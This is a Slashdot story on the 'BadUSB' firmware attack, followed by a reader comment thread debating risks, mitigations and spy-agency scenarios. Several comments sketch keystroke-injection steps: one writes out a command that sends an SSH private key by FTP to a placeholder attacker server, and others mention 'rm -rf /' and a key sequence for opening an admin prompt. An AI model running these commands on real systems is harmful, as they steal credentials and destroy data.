Beta
×

Welcome to the Slashdot Beta site -- learn more here. Use the link in the footer or click here to return to the Classic version of Slashdot.

Thank you!

Before you choose to head back to the Classic look of the site, we'd appreciate it if you share your thoughts on the Beta; your feedback is what drives our ongoing development.

Beta is different and we value you taking the time to try it out. Please take a look at the changes we've made in Beta and  learn more about it. Thanks for reading, and for making the site better!

"BadUSB" Exploit Makes Devices Turn "Evil"

timothy posted about 3 months ago | from the thinkgeek-had-something-funnier-years-ago dept.

Security 205

An anonymous reader writes with a snippet from Ars Technica that should make you (even more) skeptical about plugging in random USB drives, or allowing persons unknown physical access to your computer's USB ports: When creators of the state-sponsored Stuxnet worm used a USB stick to infect air-gapped computers inside Iran's heavily fortified Natanz nuclear facility, trust in the ubiquitous storage medium suffered a devastating blow. Now, white-hat hackers have devised a feat even more seminal—an exploit that transforms keyboards, Web cams, and other types of USB-connected devices into highly programmable attack platforms that can't be detected by today's defenses. Dubbed BadUSB, the hack reprograms embedded firmware to give USB devices new, covert capabilities. In a demonstration scheduled at next week's Black Hat security conference in Las Vegas, a USB drive, for instance, will take on the ability to act as a keyboard that surreptitiously types malicious commands into attached computers. A different drive will similarly be reprogrammed to act as a network card that causes connected computers to connect to malicious sites impersonating Google, Facebook or other trusted destinations. The presenters will demonstrate similar hacks that work against Android phones when attached to targeted computers. They say their technique will work on Web cams, keyboards, and most other types of USB-enabled devices.

Sorry! There are no comments related to the filter you selected.

Do I need to be concerned about this? (0)

Anonymous Coward | about 3 months ago | (#47574363)

Do I need to be concerned about this?

Re:Do I need to be concerned about this? (0)

Anonymous Coward | about 3 months ago | (#47574409)

No

Re:Do I need to be concerned about this? (2)

Timothy Hartman (2905293) | about 3 months ago | (#47574427)

nah. dunk your computer and USB device in holy water and it's good to go again.

Re:Do I need to be concerned about this? (4, Funny)

thieh (3654731) | about 3 months ago | (#47574541)

Nah, we are already screwed beyond help.

nah, it's an easy fix (1)

swschrad (312009) | about 3 months ago | (#47574651)

sledgehammer the sumbuck into dust and buy a new computer. no problem.

Re:Do I need to be concerned about this? (2, Interesting)

Anonymous Coward | about 3 months ago | (#47574849)

Yes, the "white-hat hackers" are Karsten Nohl and his gang. That's the guy behind the GSM hack. If he wants to know the algorithm that a smart card uses for encryption, he removes layer by layer of the chip and reconstructs the algorithm from the circuits. Nohl does not kid around. If he says it can be hacked, it can.

Re:Do I need to be concerned about this? (3, Interesting)

Penguinisto (415985) | about 3 months ago | (#47575417)

Depends.

I once worked for a company that wrote web banking software. The laptops/desktops/etc of certain employees had a 'driver' that continually monitored the USB ports. If anything plugged into it that had storage on it but not the proper corporate auth key to connect as an approved storage device? It would automatically send an email to the IT department, immediately shut off the entire USB subsystem in the OS, and it stayed that way until the device was re-imaged (in many cases making the device completely useless). It also got you immediately perp-walked out of the building and freshly unemployed, unless you could immediately give them a reasonable (and provable) explanation as to why it happened.

Now in this case, I suspect that if the bad stick presented itself to the OS as a keyboard/mouse/whatever, it may circumvent that (I say "may" because I don't know if it would be able to dump any non-keyboard/mouse-related data onto the machine w/o presenting itself as storage.)

Either way, if you're that worried about it, then epoxy the USB ports shut (well, except on the phone for obvious reasons...)

Re:Do I need to be concerned about this? (4, Insightful)

EvilSS (557649) | about 3 months ago | (#47575449)

Are you:
* A bank?
* A utility?
* A large corporation?
* A defense contractor?
* A military?
* A government?
* A "whistlebower" (in the figurative sense, not someone who just blows a literal whistle)?
* A journalist?
* A civil rights/government abuse/environmental/economic activist?
* Are you a member of an "anti-government" group or movement?
* Are you Muslim?
* Are you or have you ever been brown?
* Now or will you in the future travel through a customs inspection area of any country?
* Under active investigation by a law enforcement agency?
* A rabble-rouser?
* A person with opinions that are counter to those of your government?
* A sentient artificial lifeform?

If you answered yes to any of the above, then yes you need to be worried. If you did not, then no, you probably don't need to be worried.

USB 4.x to offer signed USB device signatures??? (5, Interesting)

Anonymous Coward | about 3 months ago | (#47574385)

Here comes the digitially signed / encrypted usb dongles for USB 4.x, where every device has a firmware signature encrypted within the device and part of the usb handshake will be to read the entire firmware to re-calc the signature to make sure it matches, with a 3rd comparison via the internet to a usb device registry.

Then the criminals will figure out how to falsify the signature with the bad firmware anyway.

Re:USB 4.x to offer signed USB device signatures?? (2)

fustakrakich (1673220) | about 3 months ago | (#47574413)

...with a 3rd comparison via the internet to a usb device registry.

That makes the whole concept dead on arrival. Anything that requires a connection is no damn good, aside from a remote terminal, I suppose

Re:USB 4.x to offer signed USB device signatures?? (0)

Anonymous Coward | about 3 months ago | (#47574505)

Of course the 3rd comparison would/could only be done *when" or "if" the device is "online"...

Perhaps something simple like a USB device checker - where any usb devices would be plugged in before they could be attached to a system that would confirm the device's firmware, signatures, etc...

Re:USB 4.x to offer signed USB device signatures?? (1)

Lumpy (12016) | about 3 months ago | (#47574793)

All you need to do is have the USB drive mounted by a locked down device. Example, RasPi set to read only on the OS and disable everything all it does is mounts the USB drive and then offers up the contents via the network.

I dont care what you have in the USB stick it will not auto run and infect. then your can look at the contents with another pc via the network and see the real contents or even run automated tests on it before it is available to the users machine.

It is not hard to make something that will stop this crap.

Re:USB 4.x to offer signed USB device signatures?? (2, Informative)

Anonymous Coward | about 3 months ago | (#47575013)

What they are talking about here infects on firmware/driver level initialization between USB device and computer when plugged in that is an inherent part of the USB standard, before and invisible to any user mode (software) inspection (and how do you plan to see/test that the usb firmware is not infected?). This is not your regular Windows auto-run type problem.

Re:USB 4.x to offer signed USB device signatures?? (1)

bill_mcgonigle (4333) | about 3 months ago | (#47574813)

That makes the whole concept dead on arrival. Anything that requires a connection is no damn good, aside from a remote terminal, I suppose

How else do you plan to distribute a CRL? The firmware can get programmed with the updated certificate store when you have access to the CRL, but it can operate fine offline without it (accepting the enhanced risk).

Re:USB 4.x to offer signed USB device signatures?? (3, Insightful)

Anonymous Coward | about 3 months ago | (#47574781)

Wouldn't it be much simpler to make USB device firmware not upgradeable? When have you ever updated the firmware on a mouse or keyboard? If there's a legitmate need to leave them upgradeable, put in a jumper or switch that is off by default.

Re:USB 4.x to offer signed USB device signatures?? (1)

Richy_T (111409) | about 3 months ago | (#47574897)

Then the hacker simply swaps the hardware for updatable hardware.

Re:USB 4.x to offer signed USB device signatures?? (2)

jakimfett (2629943) | about 3 months ago | (#47575117)

At the point where a hacker has physical access to one of your machines, you have bigger problems than whether they're going to swap out your mouse for something more easily hackable.

Re:USB 4.x to offer signed USB device signatures?? (0)

Anonymous Coward | about 3 months ago | (#47575141)

Then the hacker simply swaps the hardware for updatable hardware.

Which would require the hacker to have physical access to the machine. That kind of limits the possibilities for a potential hacker.

Re:USB 4.x to offer signed USB device signatures?? (2)

mythosaz (572040) | about 3 months ago | (#47575447)

...except that plenty of people, even those who should know better, are willing to accept a free flash drive.

And that flash drive also is a HID device, and it's going to sometimes send a series of keystrokes that issue command you don't like.

This entire hack depends on a device that looks like a keyboard, not being a keyboard, but being a keyboard AND a network card - or a flash drive that's ALSO a HID device - or a webcam that's also a BT receiver.

Re:USB 4.x to offer signed USB device signatures?? (1)

jayveekay (735967) | about 3 months ago | (#47575647)

Well perhaps the OS should ask the user "I see you've just plugged in a USB device that claims to be both a keyboard and a network adapter. Do you want to give this device both keyboard I/O and network access to your PC?"...

Basically, the same way that when you install an app on a mobile phone, the system prompts you for what capabilities you want to grant the app, your PC OS could do something similar for USB devices.

Re:USB 4.x to offer signed USB device signatures?? (0)

Anonymous Coward | about 3 months ago | (#47575051)

Then the criminals will figure out how to falsify the signature with the bad firmware anyway.

Well, it isn't exactly hard. The computer can't directly access the device firmware. You'd have to trust the device to do that.

Re:USB 4.x to offer signed USB device signatures?? (0)

Anonymous Coward | about 3 months ago | (#47575183)

You forgot: "And will only work with Windows Secure Computing."

Re:USB 4.x to offer signed USB device signatures?? (1)

microhax (2837881) | about 3 months ago | (#47575277)

And soon after that comes the USB device DLC. Out of the box it supports a single left click. $2.99 for the left and middle buttons, $4.99 for a scroll wheel, and a monthly charge of $7.99 to ensure it all stays secure.

and this is news why? (1, Insightful)

halfEvilTech (1171369) | about 3 months ago | (#47574401)

I thought it was common sense not to plug in untrusted devices to your computer. Especially unknown thumb drives, unless you can use them in a read only device.

Re:and this is news why? (2)

halfEvilTech (1171369) | about 3 months ago | (#47574421)

and of course I re-read this and realize they meant also changing a webcam or keyboard to be malicious. Man I shouldn't post before my morning coffee.

Re:and this is news why? (3, Informative)

NJRoadfan (1254248) | about 3 months ago | (#47574669)

and of course I re-read this and realize they meant also changing a webcam or keyboard to be malicious. Man I shouldn't post before my morning coffee.

Let them try reprogramming a Model M keyboard. There is one perk to legacy PS/2 ports, they are secure!

Re:and this is news why? (1)

Anonymous Coward | about 3 months ago | (#47574817)

Faking keystrokes on a PS/2 keyboard should be the same/similar to that of USB. If it wasn't, small adapters wouldn't be quite so ubiquitous.
The only security you get by using PS/2 is through obscurity, which is hardly good security.

Re:and this is news why? (2)

Blaskowicz (634489) | about 3 months ago | (#47574907)

The best security in this case is if there were no PS/2 keyboard connected before, then it won't be recognised until the computer is shut down or rebooted.
If you use a Model M, you will probably even fry the PS/2 port - but an "evil" Model M would have a replacement micro-controller that wouldn't fry the port by drawing too much current, like keyboard from the 90s and 00s don't.

Re:and this is news why? (3, Informative)

blueg3 (192743) | about 3 months ago | (#47574479)

The whole point of this is that the malware reprograms the firmware of existing, trusted devices to make them malicious.

Re:and this is news why? (2, Informative)

Anonymous Coward | about 3 months ago | (#47574789)

As far as I can tell from the article it's not "malware reprograms", it's "malicious third party with physicall acess to USB device reprograms".

Quite a bit of difference.

Re:and this is news why? (4, Insightful)

janoc (699997) | about 3 months ago | (#47574883)

I would love to see malware that will reprogram a mask-programmed blob in a common throwaway hardware. Or a microcontroller in a webcam that doesn't even have the programming pins (typically some sort of ISP or JTAG) connected to anything USB accessible (or not even connected at all, at best to some test pads).

A typical USB stick or a webcam don't have hardware to permit firmware upgrades, even though the silicon inside could be theoretically upgradable. Not to mention that the exploit would have to be written specifically for the target hardware - different processors, memory layout, USB interface, etc - all that would make it really hard to produce a generic malware. If you want to see what is involved in something like that, look at the article on hacking HDD controllers:
http://spritesmods.com/?art=hd... [spritesmods.com] And that is a harddrive, which are produced by only few manufacturers, have relatively standardized interfaces and controllers. Now imagine having to do that sort of reverse engineering on every type of harddrive in common use if you wanted to write a reasonably effective malware (e.g. a data stealing worm). It is much easier to exploit some Windows bug or use a phishing scam than this.

So yes, this is potentially a threat, but panicking over your USB sticks or webcams going rogue on you is vastly overblown. This could be an issue for a very targeted attack where the benefits of compromising e.g. a keyboard of a high value target will outweigh the effort required, but not really anything else. And that assumes that the keyboard is actually able to be updated! It would be probably simpler to just send an operative in and install e.g. a keylogger ...

Oh and they mention the "BadBios" story ... Nobody was ever able to confirm that apart from the original very confused researcher.

Reprogramming at the factory. (1)

Chmarr (18662) | about 3 months ago | (#47575543)

Okay, so, instead the blackhats break into the factory that is manufacturing the chips and modify the firmware that is being written to them. Now, every USB keyboard that the company manufactures looks to the computer as both a USB keyboard, and a USB network device.

I'm sure you remember those instances where malware was being pre-installed onto pre-formatted external drives, right?

Sure, there's a lot more to be done to turn that "Fake network device" into something that can trick the OS into treating it as a default gateway, as well as acting as a forwarding device so that modified packets can make it out the _real_ gateway, but... it only needs one weird combination of behaviours... somewhere... to be effective.

ftdi, Atmel are VERY common in devices. I did it. (2)

raymorris (2726007) | about 3 months ago | (#47575603)

I bet at least 20% of the USB devices use the same FTDI chip for USB functionality, and another 20% use Atmel AVR microcontrollers. If your malware patched or replaced the Atmel firmware, you could own a lot if systems.

It wouldn't even NEED to continue to work like the original device, so you could just replace the firmware with the Atmel firmware I wrote last night. The user plugs in their webcam or tries to turn it on. The webcam doesn't work anymore. The bad guy doesn't care, at that point he has already owned the machine, just a few seconds after the device was plugged in.

Re:and this is news why? (5, Insightful)

Canth7 (520476) | about 3 months ago | (#47574489)

I thought it was common sense not to plug in untrusted devices to your computer. Especially unknown thumb drives, unless you can use them in a read only device.

The problem at hand is that you can take a trustworthy device, plug it into an infected computer and then your trustworthy device becomes compromised and not easily detectably so, infecting your formerly clean PC. So far, no comments on mitigating procedures or OS specific circumstances. Most OSes will automatically load USB devices so in theory this could affect just about every OS whereby a compromised phone decides to become a keyboard and starts typing keystrokes and sending data to a 3rd party. Scary, at least in theory.

Re:and this is news why? (4, Interesting)

NMBob (772954) | about 3 months ago | (#47574627)

Or they could already come programmed from a "trusted" factory. It's not like that hasn't happened before. Yikes!

Not really that scary (0)

Viol8 (599362) | about 3 months ago | (#47574929)

Whats the point of the device sending keystrokes if it has no idea where they are going? "rm -rf /" ? Won't do much if you don't have a root xterm in focus or the focus is a word processor/browser/game/whatev er. Unless it acts like a mouse too and is smart enough to navigate its way around the screen, kick off an xterm , su with the root password etc etc...

But then thats with a proper OS. I guess if you're running windows all bets are off.

Re:Not really that scary (1)

Anonymous Coward | about 3 months ago | (#47574995)

Here is how it works on many windows computers: windows key, "command," menu key, down key, down key, down key, enter, left key, enter. You now have a command prompt you can do anything on with admin privileges on many computers.

Another option is: windows key + r, "iexplore example.com" as long as that site has some targeted output they are toast.

Leverage (3, Informative)

PRMan (959735) | about 3 months ago | (#47574405)

And everyone said that when Hardison would program USB sticks to type stuff and send all the data back to headquarters when they just plugged it in a computer that it was not real. It turns out he was just ahead of everyone else.

Re:Leverage (1)

jakimfett (2629943) | about 3 months ago | (#47575193)

$hat = 'tinfoil'

Nah, Leverage is just an illegally de-classified documentary of a black ops crime fighting unit from the future, sent back to us by the rebels as a warning about what's coming next.

How is this viable as an attack medium? (1)

Joe Gillian (3683399) | about 3 months ago | (#47574439)

From the article, it seems like this attack is done by hardware-modifying a USB stick so that the firmware can be changed. While I get that this is a major problem for organizations that have a bunch of computers that could potentially have one of these things inserted into them, for most people it doesn't seem like a problem. The most I can see happening with this is someone putting bad firmware onto a USB device and selling them on EBay or similar as a means of stealing people's data, but I think that would be pretty easy to track - when a whole bunch of people who all bought things from one person suddenly notice that their credit card numbers were stolen, law enforcement will figure out the trick pretty quickly.

Re:How is this viable as an attack medium? (4, Interesting)

gstoddart (321705) | about 3 months ago | (#47574475)

The most I can see happening with this is someone putting bad firmware onto a USB device and selling them on EBay or similar as a means of stealing people's data, but I think that would be pretty easy to track

Really? Because the worst I can imagine is the NSA or another spy agency getting a shipment of devices from the manufacturer so that when you get it delivered new and in the box it's already compromised. Your brand new shiny Dell or HP would be compromised from the factory.

Think I've not got enough layers of tinfoil? Google for "Cisco NSA routers".

At this point, if it can be exploited by these clowns, it will be.

law enforcement will figure out the trick pretty quickly

Unless, of course, it's law enforcement who have done it.

Re:How is this viable as an attack medium? (2)

jakimfett (2629943) | about 3 months ago | (#47575297)

I'd be interested to see how well this works against linux workstations. Having the ability to arbitrarily send keyboard commands will only be effective if a) they're the correct key commands (eg, the shortcut to open the terminal client, or a web browser, which changes depending on your desktop environment) and you can actually *do* those commands. Eg, "rm -rf /" isn't going to work without the superuser password.

That said...something like "cd ~/.ssh;ftp attack@myserver.hack;put id_rsa;exit" wouldn't necessarily need any sort of high level access...and getting ahold of someone's private key is akin to getting the holy grail, especially if you can do it without them realizing it.

Re:How is this viable as an attack medium? (3)

Anubis IV (1279820) | about 3 months ago | (#47574553)

I've heard about a few cases (which is a fancy way of saying, "I once heard a third-hand story, but am too lazy to fact check myself at the moment") of attackers leaving thumb drives in parking lots outside the buildings of offices they wanted to hack, as if the drives had been dropped out there by accident after slipping out of a pocket. Employees of the company inevitably found the drives, some of them kept the drives for personal use, and some of those drives eventually got plugged into computers inside the office. With AutoPlay settings and the like, it used to be fairly trivial for malware to enter an office that way.

Which is to say, if you find a USB drive in your company's parking lot, toss it in the trash if you can't find the original owner.

Re:How is this viable as an attack medium? (1)

Anonymous Coward | about 3 months ago | (#47575035)

I'm from a bigger company and we disable USB ports for exactly that reason. We had a rash of lost drives that when plugged in were USB composite devices. One part would be a mass storage device and the other would be a HID. After the driver was installed, they would try all sorts of tricks to get a command line or windows run box. They could then try opening websites or running programs on the USB drive that way.

Re:How is this viable as an attack medium? (1)

bware (148533) | about 3 months ago | (#47575255)

I have heard of this first hand. Plug in a USB device to see who to return it to, and not long after, security (computer and otherwise) pay you a visit to personally demonstrate the computer security policies you were supposed to learn from the online video training.

Re:How is this viable as an attack medium? (4, Interesting)

blueg3 (192743) | about 3 months ago | (#47574581)

1. A ton of USB devices are actually implemented as general-purpose components with programmable firmware (attached to whatever support hardware, like a network card or a webcam, is necessary). So they're more common than you think.

2. Smartphones are an excellent reprogrammable USB device that lots of individuals have.

3. This is difficult enough to really engineer well that it is probably a bigger threat as a targeted attack against a big organization for now. Until someone does the engineering to make it easy to deploy widely. Then, it'll be a threat for everyone. Kind of like automated hacking of consumer-grade routers to modify the firmware to participate in an Internet-wide portscan. It's the Metasploit effect: it's not a big problem until someone makes it automated, then it is.

Re:How is this viable as an attack medium? (5, Interesting)

Anonymous Coward | about 3 months ago | (#47574745)

Smartphones is the big problem. People think it is acceptable to just plug them in everywhere to "just charge them".

I can go to a train-station or another reasonable public spot. Look for a power outlet and plug in my "charging station" that turn a smartphone into a malicious device.
This will infect devices from a very diverse group that will travel around and connect their devices to whatever USB-port they can find.

Re:How is this viable as an attack medium? (1)

Anonymous Coward | about 3 months ago | (#47574799)

http://int3.cc/products/usbcondoms

Just cut the data cables in a normal usb cable. Leave the power cables intact. Job done.
(won't work if the host device requires a data connection in order to charge)

Re:How is this viable as an attack medium? (1)

Richy_T (111409) | about 3 months ago | (#47574921)

There is a further step worth taking. by adding a resistor (depends on device), the cable can signal it is a dumb charger, allowing a greater current draw if available.

Re:How is this viable as an attack medium? (1)

Anonymous Coward | about 3 months ago | (#47574633)

As I understand it, this can be done from software. IOW, a virus can silently and invisibly compromise a connected USB device for which a suitable firmware exists and can be deployed (downloaded from a command and control server after the intial virus infection has identified the USB devices attached to that system, or perhaps even patched on the fly, given enough common code accross devices )

See the USB DFU or device firmware upgrade standard.
Not all devices adhere to the standard as read, but they do behave predictably and discovering the methods by which DFU mode or it's equivalent is enabled is not difficult.

Morbidly fascinating.

Oh think of the fun when drivers update firmware (1, Troll)

silas_moeckel (234313) | about 3 months ago | (#47574467)

Windows loves to install USB drivers for all sorts of things. A couple NSA letters later and MS is now sending NSA payloads. They do not even have to ever touch the hardware.

Sure this is the case with any hardware and MS but you would assume a secure facility would lock it down. But USB now you have the sneaker net issues.

Re:Oh think of the fun when drivers update firmwar (0)

Anonymous Coward | about 3 months ago | (#47574557)

I was wondering where the AntiMS bullshit was

Re:Oh think of the fun when drivers update firmwar (0)

Anonymous Coward | about 3 months ago | (#47574787)

It's the only OS I know that updates firmware on devices without me asking for it.

Re:Oh think of the fun when drivers update firmwar (0)

Anonymous Coward | about 3 months ago | (#47575595)

It's the only OS I know that updates firmware on devices without me asking for it.

I think that you may be a little confused. I've been using computers for over 20 years and i still haven't seen Windows update a firmware on it's own. FIRMware?. I think you don't have a clue about what you're talking about.

Re: Oh think of the fun when drivers update firmwa (0)

Anonymous Coward | about 3 months ago | (#47575037)

Yet he made a valid point which you did not answer. MS is compromized and we need to face that.

Re: Oh think of the fun when drivers update firmwa (0)

Anonymous Coward | about 3 months ago | (#47575545)

Yet he made a valid point which you did not answer. MS is compromized and we need to face that.

Valid?, really?. I don't see it. What the hell does drivers have to do with anything?.

Re:Oh think of the fun when drivers update firmwar (1)

blueg3 (192743) | about 3 months ago | (#47574659)

A couple NSA letters later and MS is now sending NSA payloads.

Because they couldn't already do this with network-distributed software updates?

Actually not all that hard.... (0)

Anonymous Coward | about 3 months ago | (#47574469)

Most keyboards and other such devices use PIC, or similar, USB microcontrollers (e.g. PIC18F14K50). If the developers didn't lock down the programability of the existing microcontroller they can easily be reprogrammed. Albit - usually not through the USB port - but thruogh other pins on the chip. That requires physical access to the keyboard to plant the malicious code. As long as the device uses the OS's HUD drivers - nothing needs to be changed/updated/detected on the host side.

Now, to create a new keyboard, camera, drive, etc. that has malicious code built in from the git go... is, actually, rather trivial. And, again, so long as the devlopers stick to the HUD drivers - this is not much more than an afternoon project.

In otherwords - been there - done that. Nothing to see here. Move along.

Go pickup Microchips Low Pin Count USB Development KIT for around $100 from Mouser - you get a programmer and development board. Download the compilers and have at it.

I think the reason no one reported this before is that everyone thought that someone alread did.

Simple (2)

NotInHere (3654617) | about 3 months ago | (#47574527)

just ask the user whether they want that second keyboard, network card, or mouse attached. And a malicious DNS server is also not the thing that doesn't let me sleep at night -- https was designed for that.

Re:Simple (5, Funny)

stewsters (1406737) | about 3 months ago | (#47574615)

"Click OK to connect mouse"

It leave a bit of a chicken and egg problem for normal users of systems without a keyboard built in.

Re:Simple (1)

robmv (855035) | about 3 months ago | (#47574685)

Input this code I show you on screen with this virtual keyboard, and the OS filter everu other input event from that device that is not targeted to that keyboard, validate the input and accept or reject the device, annoying I know, but not impossible to protect

Re:Simple (1)

mythosaz (572040) | about 3 months ago | (#47575493)

It's still chicken and egg. Even if you have a touchscreen, that screen is an input device too, you know.

Re:Simple (0)

Anonymous Coward | about 3 months ago | (#47574717)

So the NSA forces Google or someone like them to issue certificates in the name of "national security", or just tricks you into installing them yourself, some companies do that to their employees. Then your browser says "this is legit, no worries mate" and you might go "thanks bud, no worries then".
There were fake certs for yahoo and google out there people were using, so it's not impossible, you just need to force an issuer to give them to you.

Old attack (4, Insightful)

robmv (855035) | about 3 months ago | (#47574549)

This kind of attack is not new, the new part are the examples of generic devices with hacked firmware to do that. This can be solved easily requesting user autorization before activating any USB device type, for example, before telling the system that there is a new USB network device, ask the user for confirmation. The trick is with input devices, where the new device could be replacing a broken one (keyboard or mouse), the confirmation can be done requesting the user to type a code displayed on screen or using the mouse to use a on screen keyboard in order to accept the input device for general usage. The other problem is with devices permanently attached, assume that any attached device at boot time is trusted, If someone replaced your USB device when you weren't present other more awful things couls have been done.

Re:Old attack (0)

Anonymous Coward | about 3 months ago | (#47575473)

So, with this in mind ...

On linux, when 'udev' is probing for hardware identification post USB dev plugin, it is presumably 'reading' (running..?) that USB firmware, correct? Perhaps a module gets loaded from kernel, not from USB dev, and the device is now resident in /dev. Going beyond that, how would that 'firmware' be doing anything evil? Only way I see would be with ability to elevate itself out of udev process UID, to execute commands and communications. Wouldn't this require multiple software failures within udev, linux kernel, initrc, openrc, passwd, etc ... ?

SD Cards too (0)

Anonymous Coward | about 3 months ago | (#47574555)

Don't forget how easy it is to program the little ARM processor on a WiFi SD card: http://haxit.blogspot.ch/2013/08/hacking-transcend-wifi-sd-cards.html

Minimal Alert (1)

NotQuiteReal (608241) | about 3 months ago | (#47574559)

Yet another annoyance, necessary in this "modern" world...

While not a real solution at all, it should be easy for any OS to at least offer pop-up an approval when you plug in a USB device. E.g. "Do you want to connect this keyboard"? That would be a red flag if you didn't think it was a keyboard and give you a chance to deny it.

Maybe skip the warning for pure storage devices - but warn for anything else. It might be disconcerting to have a warning for "Connect this video camera" when you were plugging in a keyboard.

Re:Minimal Alert (1)

amorsen (7485) | about 3 months ago | (#47574677)

USB device drivers are not of sufficient quality to make that mitigation very viable. Just exploit the broken drivers instead; on most operating systems device drivers have the equivalent of root privileges.

Re:Minimal Alert (1)

Minwee (522556) | about 3 months ago | (#47575059)

NOTICE: USB DEVICES CONNECTED
The following devices have been connected to USB bus 5:
Device 0, Device ID="0123:4567", Manufacturer="Harmless USB Devices, Inc", DeviceClass="Hub", DeviceProtocol="Full speed hub"
Device 1, Device ID="0123:4567", Manufacturer="Harmless USB Devices, Inc", InterfaceClass="Mass Storage", InterfaceProtocol="Bulk Only"
Device 2, Device ID="0000:0000", Manufacturer="What is this", InterfaceClass="Human Interface Device", InterfaceProtocol="Keyboard"
Device 3, Device ID="0000:0000", Manufacturer="I don't even", InterfaceClass="Communications Device", InterfaceProtocol="AT-Commands", Interface="HSPA+ Mobile Broadband Modem"

The information is already there if you know where to look for it. All that would be required would be to put it into a notification window that attracts a bit more attention. It wouldn't prevent this kind of attack -- that would require user consent for activating any new devices, and be bit challenging if that was your only functional keyboard -- but it would force naughty USB devices masquerading as harmless purveyors of porn^H^H^H^H useful business-related data to tip their hands when they try doing something they shouldn't.

Superglue all USB slots (1)

Ted Stoner (648616) | about 3 months ago | (#47574609)

A little dab 'll do ya ...

Re:Superglue all USB slots (1)

SydShamino (547793) | about 3 months ago | (#47574725)

Except the ones for your keyboard and mouse, right? Except your keyboard broke, so just plug in this new one you got from Dell via NSAUSPS.

Re:Superglue all USB slots (1)

Minwee (522556) | about 3 months ago | (#47575065)

Nah. Glue all of the USB ports up and only use safe, secure, wireless solutions like Bluetooth for your keyboard and mouse.

That should solve all of your security problems in a single stroke.

Re:Superglue all USB slots (1)

Minwee (522556) | about 3 months ago | (#47575071)

(I can't believe that I was able to type that with a straight face.)

Safety first, kids... (5, Funny)

blueshift_1 (3692407) | about 3 months ago | (#47574619)

Just another reason why you shouldn't stick foreign objects in your orifices...

Re:Safety first, kids... (1)

Nyder (754090) | about 3 months ago | (#47574749)

Just another reason why you shouldn't stick foreign objects in your orifices...

www.bad-dragon.com is okay though.

Re:Safety first, kids... (3, Funny)

gstoddart (321705) | about 3 months ago | (#47574927)

"Just another reason why you shouldn't stick foreign objects in your orifices..."

www.bad-dragon.com is okay though.

Must .... not ... paste ... URL ... into ... browser

Gak, that's so wrong, you sick bastard. ;-)

Not just USB (1)

jones_supa (887896) | about 3 months ago | (#47574629)

Almost any hardware component can be tampered with.

PS/2 Keyboard (0)

Anonymous Coward | about 3 months ago | (#47574631)

What about my PS/2 keyboard ;)

White hat hackers, if you build it I will come. (0)

Anonymous Coward | about 3 months ago | (#47574655)

We need an intermediate USB reader with programmable capabilities to display the USB ROM code and display that before the system is manually allowed to connect to it.

BUILD IT!

Re:White hat hackers, if you build it I will come. (1)

blueg3 (192743) | about 3 months ago | (#47574699)

It'd probably be easier to implement a little hardware device that places restrictions on device classes that can connect through it and limits hybrid devices (e.g., keyboard+mouse = ok, keyboard+webcam = reject).

Limited scope of vulnerability (2)

jrumney (197329) | about 3 months ago | (#47574733)

OK, this makes a bit more sense than the MSM version I read half an hour ago. In that article, they made it sound like USB keyboards were spreading a virus by reprogramming the USB controller chips on motherboards, which sounded a bit too far fetched to me (maybe one brand could be vulnerable - but a widespread problem?). In the Ars story it sounds more like they are reprogramming the firmware in the USB device itself to act as a different device. Cute trick, possibly useful against a carefully chosen target, but the likelyhood of a widespread attack seems minimal. And auditing your devices would be quite easy - just keep an eye on what device types are showing up in /sys/bus/usb or device manager.

Re:Limited scope of vulnerability (1)

John Bokma (834313) | about 3 months ago | (#47575611)

just keep an eye on what device types are showing up in /sys/bus/usb or device manager.

I'll pass this on to my mother, thanks!

PS/2 (1)

kheldan (1460303) | about 3 months ago | (#47574747)

Time to dig those PS/2 keyboards and mice out of the back of the closet, I guess..

Re:PS/2 (1)

Blaskowicz (634489) | about 3 months ago | (#47574941)

I always choose a motherboard with both ports. Can be very useful even if you start out with both peripherals as USB. e.g. when my USB mouse broke, I got the older PS/2 one from a drawer and it still works very fine. Likewise I broke a keyb from 2010 or 2011 and ultimately replaced it with one from 1996 (which has grease and a space bar that needs serviced but registers all keys)

Re:PS/2 (1)

JazzLad (935151) | about 3 months ago | (#47575229)

Nah, you can always use a USB to PS/2 adapter - I found a supplier that sells them cheap!


Preemptive whooosh for the humour-impaired

How many have been bulk-mailed for Fortune 500s? (3, Insightful)

swb (14022) | about 3 months ago | (#47574753)

If you had the money/resources, you could create these things by the thousand and bulk-mail these to major companies. It would stand to reason that somebody would end up plugging them into their office computer, enabling a back door.

You could go even further and create hacked 5 port switches or access points and ship them off to big company branch offices, where users may be more likely to ignore standards or be short on resources and use those kinds of things anyway. You could put a return label on it for the office supply company or even the HQ office so that users thought it was something they had gotten by accident.

I'd bet in a lot of cases people would just say "sweet" and go ahead and use them in the office, giving you a back door. A switch or access point would have enough space inside that custom hardware could be inserted giving a lot better back door, like having your own computer on their network.

Re:How many have been bulk-mailed for Fortune 500s (0)

Anonymous Coward | about 3 months ago | (#47575615)

Been There Done That, discovered Ford has good opsec. 0/50 return on 512meg fobs.

Irongeek did similar presentations in 2010. (1)

Anonymous Coward | about 3 months ago | (#47574831)

How is this a significantly different concept from his PHUKD (Programmable HID USB Keystroke Dongle) devices from 2010?

http://www.irongeek.com/i.php?page=security/programmable-hid-usb-keystroke-dongle

(great acronym, btw)

Re:Irongeek did similar presentations in 2010. (0)

Anonymous Coward | about 3 months ago | (#47575049)

The difference is that this works on a large number of "normal" usb devices instead of a specifically programmable board. The issue is that all sorts of things like keyboards and usb drives let their usb firmware be replaced.

Doesn't sound like much of a leap (1)

bussdriver (620565) | about 3 months ago | (#47575373)

I was reading about more capable hacks back in 2005 back when there were people doing attacks against the generic device drivers for ... well, any type of USB device driver. Plus using it to pick up the keyboard or injecting data to mess with other devices on the bus.

TFA sounds to me like a much more limited attack and not all that creative since we've had a decade+ of USB devices that spoofed multiple devices -- I'm specifically thinking of those spoofed CD-ROM drives on some of those old Flash sticks.

Keyboards? doesn't sound all that useful at 1st glance... but finding a fool proof script to open up a terminal on a mac sounds like an interesting challenge. linux? too much variety. windows... getting to the run cmd is easy.

If you don't have a locked screen saver... which has been a MUST forever... a well written script could just be run from anywhere (just post it online, type in the URL and exec the file) which does most everything you need without admin access but could later also trigger some stuff to attempt privilege escalation attacks... like the police can already buy on usb flash (and whose software is signed by the OS vendor as trusted.)

What would really be interesting are attacks that unlock the screen saver... or some generic driver exploit that allows custom error messages to pop up on the OS... "The radiation shield on your monitor has broken, please sit back 4 ft to avoid being irradiated."

Although given the huge number of exploits and flaws in drivers--- I would like to see something push for greater quality and if that means popular USB stick exploits where it spoofs crap hardware to trigger automatic installation of crap drivers... would be nice to see hardware vendor drivers getting banned/noticed for poor quality.

Cheap mitigation of the problem: USB patch cables (0)

